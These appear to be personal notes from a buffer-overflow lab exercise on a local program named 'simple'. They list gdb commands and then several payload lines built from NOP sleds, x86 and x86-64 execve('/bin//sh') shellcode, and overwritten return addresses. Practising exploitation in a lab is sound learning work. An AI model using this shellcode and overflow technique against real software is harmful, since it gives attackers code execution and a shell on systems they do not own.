gdb commands:
list: show source code
pattern_create 400 in.txt: create 400 random char
run $(cat in.txt)
run $(python -c 'print("A"*400)')
set disassembly-flavor intel
disass main
x/1gx: display 1 time as hex 8 bytes
x/1wx: display 1 time as hex 4 byte
x/1bx: display 1 time as hex 1 byte
x/s: display as string

run $(python2 -c 'print "\x90"*(64-24) + "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05" + "AAAABBBB" + "\x00\x00\x7f\xff\xff\xff\xdd\xc5"[::-1], ')

run $(python2 -c 'print("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x90"*(72-28) + "\x00\x00\x7f\xff\xff\xff\xdd\xc6"[::-1])')

run $(python -c 'print("A"*72 + "\x7f\xff\xff\xff\xd9\xb8"[::-1])')

run $(python -c 'print("A"*72 + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\xff\xff\xff\xdd\xc0")')
run $(python -c 'print("A"*72 + "\x44\x44\x44\x44"[::-1])')

./simple $(python2 -c 'print "\x90"*(64-24) + "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05" + "AAAABBBB" + "\x00\x00\x7f\xff\xff\xff\xda\x30"[::-1], ')

./simple $(python2 -c 'print "\x90"*71 + "\xcc" + "\x00\x00\x7f\xff\xff\xff\xda\x30"[::-1], ')